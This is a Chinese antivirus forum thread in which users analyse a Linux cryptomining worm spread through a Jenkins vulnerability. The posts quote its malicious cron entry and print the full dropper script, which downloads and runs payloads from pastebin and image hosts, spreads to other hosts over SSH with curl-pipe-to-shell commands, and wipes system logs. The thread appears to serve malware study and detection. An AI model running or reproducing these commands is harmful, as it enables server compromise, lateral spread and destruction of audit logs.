查看: 3322|回复: 8
收起左侧

[病毒样本] 一个linux病毒,基于Jenkins漏洞传播

[复制链接]
calyperides
发表于 2019-4-4 15:29:52 | 显示全部楼层 |阅读模式
本帖最后由 calyperides 于 2019-4-4 16:21 编辑

今天群里的一个讨论:*/15 * * * * (curl -fsSL https://pastebin.com/raw/v5XC0BJh||wget -q -O- https://pastebin.com/raw/v5XC0BJh)|sh
一个来自定时任务的病毒,有条件的可以自己测试。
病毒文件较大,传不上来,需要自己下载一下!
kaba666
发表于 2019-4-4 16:27:16 | 显示全部楼层
网页打不开
神龟Turmi
发表于 2019-4-4 20:16:59 | 显示全部楼层
本帖最后由 神龟Turmi 于 2019-4-4 20:18 编辑

下下来的shell会再次从同一个域名下载另一个shell。。。

本体:
(看起来像后门?)顺便。。。apt-get install cron -y||yum install crontabs -y||apk add cron -y这可太秀了 要是我服务器是fedora或者openSUSE呢。。。
  1. export PATH=$PATH:/bin:/usr/bin:/sbin:/usr/local/bin:/usr/sbin

  2. mkdir -p /tmp
  3. chmod 1777 /tmp

  4. ps -ef|grep -v grep|grep hwlh3wlh44lh|awk '{print $2}'|xargs kill -9
  5. ps -ef|grep -v grep|grep Circle_MI|awk '{print $2}'|xargs kill -9
  6. ps -ef|grep -v grep|grep get.bi-chi.com|awk '{print $2}'|xargs kill -9
  7. ps -ef|grep -v grep|grep hashvault.pro|awk '{print $2}'|xargs kill -9
  8. ps -ef|grep -v grep|grep nanopool.org|awk '{print $2}'|xargs kill -9
  9. ps -ef|grep -v grep|grep /usr/bin/.sshd|awk '{print $2}'|xargs kill -9
  10. ps -ef|grep -v grep|grep /usr/bin/bsd-port|awk '{print $2}'|xargs kill -9
  11. ps -ef|grep -v grep|grep "xmr"|awk '{print $2}'|xargs kill -9
  12. ps -ef|grep -v grep|grep "xig"|awk '{print $2}'|xargs kill -9
  13. ps -ef|grep -v grep|grep "ddgs"|awk '{print $2}'|xargs kill -9
  14. ps -ef|grep -v grep|grep "qW3xT"|awk '{print $2}'|xargs kill -9
  15. ps -ef|grep -v grep|grep "wnTKYg"|awk '{print $2}'|xargs kill -9
  16. ps -ef|grep -v grep|grep "t00ls.ru"|awk '{print $2}'|xargs kill -9
  17. ps -ef|grep -v grep|grep "sustes"|awk '{print $2}'|xargs kill -9
  18. ps -ef|grep -v grep|grep "thisxxs"|awk '{print $2}' | xargs kill -9
  19. ps -ef|grep -v grep|grep "hashfish"|awk '{print $2}'|xargs kill -9
  20. ps -ef|grep -v grep|grep "kworkerds"|awk '{print $2}'|xargs kill -9
  21. ps -ef|grep -v grep|grep "/tmp/devtool"|awk '{print $2}'|xargs kill -9
  22. ps -ef|grep -v grep|grep "systemctI"|awk '{print $2}'|xargs kill -9
  23. ps -ef|grep -v grep|grep "kpsmouseds"|awk '{print $2}'|xargs kill -9
  24. ps -ef|grep -v grep|grep "kthrotlds"|awk '{print $2}'|xargs kill -9
  25. ps -ef|grep -v grep|grep "kintegrityds"|awk '{print $2}'|xargs kill -9
  26. ps -ef|grep -v grep|grep "suolbcc"|awk '{print $2}'|xargs kill -9
  27. ps aux|grep -v grep|grep -v khugepageds|awk '{if($3>=50.0) print $2}'|xargs kill -9
  28. apt-get install curl -y||yum install curl -y||apk add curl -y
  29. apt-get install cron -y||yum install crontabs -y||apk add cron -y
  30. systemctl start crond
  31. systemctl start cron
  32. systemctl start crontab
  33. service start crond
  34. service start cron
  35. service start crontab

  36. if [ ! -f "/tmp/.X11unix" ]; then
  37.     ARCH=$(uname -m)
  38.     if [ ${ARCH}x = "x86_64x" ]; then
  39.         (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL [img]http://sowcar.com/t6/695/1554378967x2890149536.jpg[/img] -o /tmp/kerberods||wget --timeout=30 --tries=3 -q [img]http://sowcar.com/t6/695/1554378967x2890149536.jpg[/img] -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/ah0UwIRR -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/ah0UwIRR -O /tmp/kerberods) && chmod +x /tmp/kerberods
  40.     elif [ ${ARCH}x = "i686x" ]; then
  41.         (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL [img]http://sowcar.com/t6/695/1554379008x2890149536.jpg[/img] -o /tmp/kerberods||wget --timeout=30 --tries=3 -q [img]http://sowcar.com/t6/695/1554379008x2890149536.jpg[/img] -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/8CoVv7ug -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/8CoVv7ug -O /tmp/kerberods) && chmod +x /tmp/kerberods
  42.     else
  43.         (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL [img]http://sowcar.com/t6/695/1554379008x2890149536.jpg[/img] -o /tmp/kerberods||wget --timeout=30 --tries=3 -q [img]http://sowcar.com/t6/695/1554379008x2890149536.jpg[/img] -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/8CoVv7ug -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/8CoVv7ug -O /tmp/kerberods) && chmod +x /tmp/kerberods
  44.     fi
  45.         /tmp/kerberods
  46. elif [ ! -f "/proc/$(cat /tmp/.X11unix)/io" ]; then
  47.     ARCH=$(uname -m)
  48.     if [ ${ARCH}x = "x86_64x" ]; then
  49.         (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL [img]http://sowcar.com/t6/695/1554378967x2890149536.jpg[/img] -o /tmp/kerberods||wget --timeout=30 --tries=3 -q [img]http://sowcar.com/t6/695/1554378967x2890149536.jpg[/img] -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/ah0UwIRR -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/ah0UwIRR -O /tmp/kerberods) && chmod +x /tmp/kerberods
  50.     elif [ ${ARCH}x = "i686x" ]; then
  51.         (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL [img]http://sowcar.com/t6/695/1554379008x2890149536.jpg[/img] -o /tmp/kerberods||wget --timeout=30 --tries=3 -q [img]http://sowcar.com/t6/695/1554379008x2890149536.jpg[/img] -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/8CoVv7ug -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/8CoVv7ug -O /tmp/kerberods) && chmod +x /tmp/kerberods
  52.     else
  53.         (curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL [img]http://sowcar.com/t6/695/1554379008x2890149536.jpg[/img] -o /tmp/kerberods||wget --timeout=30 --tries=3 -q [img]http://sowcar.com/t6/695/1554379008x2890149536.jpg[/img] -O /tmp/kerberods||curl --connect-timeout 30 --max-time 30 --retry 3 -fsSL https://pixeldrain.com/api/file/8CoVv7ug -o /tmp/kerberods||wget --timeout=30 --tries=3 -q https://pixeldrain.com/api/file/8CoVv7ug -O /tmp/kerberods) && chmod +x /tmp/kerberods
  54.     fi
  55.         /tmp/kerberods
  56. fi

  57. if [ -f /root/.ssh/known_hosts ] && [ -f /root/.ssh/id_rsa.pub ]; then
  58.   for h in $(grep -oE "\b([0-9]{1,3}\.){3}[0-9]{1,3}\b" /root/.ssh/known_hosts); do ssh -oBatchMode=yes -oConnectTimeout=5 -oStrictHostKeyChecking=no $h '(curl -fsSL https://pastebin.com/raw/HdjSc4JR||wget -q -O- https://pastebin.com/raw/HdjSc4JR)|sh >/dev/null 2>&1 &' & done
  59. fi

  60. echo 0>/var/spool/mail/root
  61. echo 0>/var/log/wtmp
  62. echo 0>/var/log/secure
  63. echo 0>/var/log/cron
  64. #
复制代码

评分

参与人数 1人气 +1 收起 理由
Jirehlov1234 + 1 感谢解答: )

查看全部评分

cs_virus
发表于 2019-4-5 10:46:03 | 显示全部楼层

本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
calyperides
 楼主| 发表于 2019-4-6 18:30:45 | 显示全部楼层
神龟Turmi 发表于 2019-4-4 20:16
下下来的shell会再次从同一个域名下载另一个shell。。。

本体:

这一段貌似不完整,有一个语句是判定操作系统的,列举了几类系统,完全靠猜的方式去实现。
那个jpg文件改名以后,赋予执行权限,暂时只看到这个病毒占用了相当大的cpu资源,但是他们说会控制内核,不知道哪里实现的。
神龟Turmi
发表于 2019-4-9 13:14:36 | 显示全部楼层
calyperides 发表于 2019-4-6 18:30
这一段貌似不完整,有一个语句是判定操作系统的,列举了几类系统,完全靠猜的方式去实现。
那个jpg文件 ...

我没有linux的虚拟机 在阿里云的机器上跑了一下被安骑士干掉了 提示是挖矿
tg123321
发表于 2019-4-9 18:02:48 | 显示全部楼层
本帖最后由 tg123321 于 2019-4-9 18:04 编辑

图片链接带毒
eset for Linux:Linux/CoinMiner.HO 特洛伊木马 的变种

我梦
发表于 2019-4-9 19:31:22 | 显示全部楼层
换个网盘传吧
tg123321
发表于 2019-4-13 12:00:58 | 显示全部楼层
本帖最后由 tg123321 于 2019-4-13 15:10 编辑

病毒失效了


本帖子中包含更多资源

您需要 登录 才可以下载或查看,没有帐号?快速注册

x
您需要登录后才可以回帖 登录 | 快速注册

本版积分规则

手机版|杀毒软件|软件论坛| 卡饭论坛

Copyright © KaFan  KaFan.cn All Rights Reserved.

Powered by Discuz! X3.4( 沪ICP备2020031077号-2 ) GMT+8, 2024-4-18 18:17 , Processed in 0.135055 second(s), 18 queries .

卡饭网所发布的一切软件、样本、工具、文章等仅限用于学习和研究,不得将上述内容用于商业或者其他非法用途,否则产生的一切后果自负,本站信息来自网络,版权争议问题与本站无关,您必须在下载后的24小时之内从您的电脑中彻底删除上述信息,如有问题请通过邮件与我们联系。

快速回复 客服 返回顶部 返回列表